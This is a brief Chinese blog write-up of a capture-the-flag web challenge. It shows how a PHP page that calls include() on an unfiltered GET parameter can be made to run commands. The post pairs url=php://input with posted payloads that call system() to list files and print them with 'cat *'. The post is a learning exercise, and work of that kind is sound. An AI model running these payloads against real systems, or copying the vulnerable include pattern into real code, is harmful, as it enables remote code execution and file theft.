include与php://input执行任意命令

题目地址https://ctf.show/challenges#web3-8

条件是include(xxx);
xxx参数可以控制

代码如下:

<?php include($_GET['url']);?>

构造url=php://input
传入

<?php system("ls"); ?>
<?php system("cat *"); ?>

posted @ 2020-10-29 20:37  10nnn4R  阅读(241)  评论(0编辑  收藏